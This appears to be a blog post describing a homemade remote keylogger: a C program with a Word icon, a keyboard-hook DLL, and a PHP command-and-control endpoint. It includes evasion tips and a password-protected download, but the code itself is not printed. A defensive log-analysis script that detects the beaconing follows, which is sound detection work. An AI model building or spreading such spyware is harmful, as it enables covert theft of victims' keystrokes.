Salutations, fellow hackers and crackers alike!
Over the past few months I’ve been off and on writing a remote key logger. Why? Just to keep sharp I guess. How can we hope to stay on top of malware trends if we don’t attempt to think like the enemy? The fine line between white hat and black hat.
The following was done in 3 parts.
1) The static key logger initialization app. A plain old windowless application that invokes a DLL (not a console app, since Windows apps are smaller for some reason). The program has a 5 minute timer (changeable in the source) that takes the logged keystroke files, converts them into an encrypted format and sends them off to our CNC script.
2) The keyboard hook DLL. The file responsible for logging the keystrokes of other programs and for storing the info in a file for later use.
3) The CNC script. A small PHP script I wrote placed on a web server that does a basic User Agent string check before processing POST requests containing encrypted data. I think I used Chrome 23, though in hindsight, I should have used a special cookie or something.
The whole thing was made in C and PHP, has a word document icon, and when compiled, is less than 85KB in size (including DLL). No packing done, so it could technically go smaller.
Internally, I am utilizing a form of off-beat encoding to send the data. It looks like XOR, but it’s not. It’s base64 with an alternate library like unicode and such. Communication is done with HTTP requests, though if you want to remain stealthy longer, use an HTTPS server instead. This is changed in the defines section:
You can download the entire collection of code here. The password is ‘lolwut’.
Joes Remote Key Logger
One final note, I compiled this with the Pelles C compiler, although I’m certain you could get this to work with little effort in Visual Studio or with MinGW / CodeBlocks / DevC++.
Presently there is no malware signature for these files and I’d like to keep it this way. Then again, why would there be a signature? I just wrote the thing! Please use this responsibly.
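As an added example from the defender's side (not code from this post or its download), the beaconing pattern described above, a POST to one PHP endpoint every 5 minutes with a pinned, out-of-date Chrome 23 User-Agent, is visible in ordinary web-server logs. The log lines, the endpoint name and the UA string below are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache "combined" log lines: 10.0.0.5 POSTs to /cnc.php roughly
# every 300s with one fixed Chrome 23 UA; the 10.0.0.7 lines are normal noise.
UA23 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
SAMPLE_LOG = f"""\
10.0.0.5 - - [12/Mar/2013:10:00:01 +0000] "POST /cnc.php HTTP/1.1" 200 2 "-" "{UA23}"
10.0.0.7 - - [12/Mar/2013:10:01:30 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0"
10.0.0.5 - - [12/Mar/2013:10:05:02 +0000] "POST /cnc.php HTTP/1.1" 200 2 "-" "{UA23}"
10.0.0.7 - - [12/Mar/2013:10:06:10 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0"
10.0.0.5 - - [12/Mar/2013:10:10:00 +0000] "POST /cnc.php HTTP/1.1" 200 2 "-" "{UA23}"
10.0.0.5 - - [12/Mar/2013:10:15:03 +0000] "POST /cnc.php HTTP/1.1" 200 2 "-" "{UA23}"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_beacons(lines, min_hits=3, jitter=0.2):
    """Group POSTs by (client IP, path, User-Agent) and flag groups whose gaps
    between requests all fall within +/- jitter of the median gap.
    Returns {(ip, path, ua): period_in_seconds} for the flagged groups."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST":
            groups[(rec["ip"], rec["path"], rec["ua"])].append(rec["ts"])
    beacons = {}
    for key, stamps in groups.items():
        if len(stamps) < min_hits:          # too few requests to judge regularity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = sorted(gaps)[len(gaps) // 2]   # median gap, robust to one outlier
        if all(abs(g - period) <= jitter * period for g in gaps):
            beacons[key] = period
    return beacons

if __name__ == "__main__":
    for (ip, path, ua), period in find_beacons(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} -> POST {path} every ~{period:.0f}s, UA pinned to {ua.split()[-2]}")
```

A pinned browser version that never changes across months of requests, combined with a fixed period, is the signal; the timer value is configurable, so match on regularity rather than on exactly 300 seconds.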